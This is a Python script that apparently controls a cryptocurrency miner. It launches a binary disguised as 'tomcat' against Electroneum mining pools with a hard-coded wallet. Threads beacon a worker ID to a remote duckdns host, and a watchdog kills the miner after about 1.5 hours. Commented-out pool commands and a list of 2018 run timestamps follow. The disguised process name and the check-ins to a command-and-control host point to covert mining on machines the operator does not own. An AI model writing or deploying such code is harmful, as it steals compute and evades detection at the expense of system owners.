import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:43:05.861943
#2018-02-17 17:32:06.795825
#2018-02-17 19:20:01.344070
#2018-02-17 21:11:02.192283
#2018-02-17 22:55:06.677812
#2018-02-18 00:41:05.840433
#2018-02-18 02:31:04.290992
#2018-02-18 04:18:01.439054
#2018-02-18 06:09:02.116148
#2018-02-18 07:58:04.565646
#2018-02-18 09:46:01.271036
#2018-02-18 11:32:05.725112
#2018-02-18 13:18:04.281800
#2018-02-18 15:07:07.161134
#2018-02-18 16:54:04.948280
#2018-02-18 18:43:03.742437
#2018-02-18 20:30:09.084238
#2018-02-18 22:16:01.634381
#2018-02-19 00:05:04.221413
#2018-02-19 01:51:05.399187
#2018-02-19 03:38:08.441456
#2018-02-19 05:23:05.815017
#2018-02-19 07:11:08.188983
#2018-02-19 08:59:05.653097
#2018-02-19 10:48:02.168188
#2018-02-19 12:36:04.520273
#2018-02-19 14:24:04.640703
#2018-02-19 16:12:09.019757
#2018-02-19 17:58:08.510521
#2018-02-19 19:44:06.445541
#2018-02-19 21:31:05.729214
#2018-02-19 23:16:07.452737
#2018-02-20 01:02:06.972854
#2018-02-20 02:51:06.155841
#2018-02-20 04:40:09.187423
#2018-02-20 06:24:06.787973
#2018-02-20 08:09:03.836061
#2018-02-20 09:54:08.078591
#2018-02-20 11:38:04.660121
#2018-02-20 13:27:01.430446
#2018-02-20 15:12:01.657593
#2018-02-20 16:58:09.233070
#2018-02-20 18:48:01.902497
#2018-02-20 20:39:05.516149
#2018-02-20 22:23:08.450526
#2018-02-21 00:04:08.355747
#2018-02-21 01:49:07.843257
#2018-02-21 03:37:05.090351
#2018-02-21 05:25:05.612182
#2018-02-21 07:12:10.602304
#2018-02-21 08:57:07.320659
#2018-02-21 10:44:07.602319
#2018-02-21 12:31:04.672420
#2018-02-21 14:18:04.271755
#2018-02-21 16:05:11.066650
#2018-02-21 17:56:09.585947
#2018-02-21 19:42:05.940690
#2018-02-21 21:32:06.025170
#2018-02-21 23:17:06.996965
#2018-02-22 01:06:07.482057
#2018-02-22 02:55:07.554865
#2018-02-22 04:42:08.493941
#2018-02-22 06:27:07.515921
#2018-02-22 08:14:08.685990
#2018-02-22 10:03:08.157753
#2018-02-22 11:46:06.687303
#2018-02-22 13:32:07.895998
#2018-02-22 15:20:06.964610
#2018-02-22 17:06:05.694008
#2018-02-22 18:53:09.678957
#2018-02-22 20:45:10.890826
#2018-02-22 22:32:01.613856
#2018-02-23 01:16:01.732477
#2018-02-23 03:04:05.505752
#2018-02-23 04:49:04.618979
#2018-02-23 06:35:01.534933
#2018-02-23 08:23:05.234077
#2018-02-23 10:40:10.473361
#2018-02-23 12:35:03.951579
#2018-02-23 14:21:01.764022
#2018-02-23 16:12:09.875342
#2018-02-23 17:57:05.155904
#2018-02-23 19:44:06.698322
#2018-02-23 21:28:04.781468
#2018-02-23 23:18:02.199013
#2018-02-24 01:08:06.273934
#2018-02-24 02:58:01.721187
#2018-02-24 02:59:01.690927
#2018-02-24 04:46:03.523195
#2018-02-24 06:29:05.173252
#2018-02-24 08:18:02.037798
#2018-02-24 10:01:07.570312
#2018-02-24 11:58:01.279290
#2018-02-24 13:46:05.433485
#2018-02-24 15:34:01.332982
#2018-02-24 17:28:07.115629
#2018-02-24 19:15:06.160313
#2018-02-24 21:02:05.922117
#2018-02-24 23:35:05.923780
#2018-02-25 02:56:04.886552
#2018-02-25 06:57:03.473560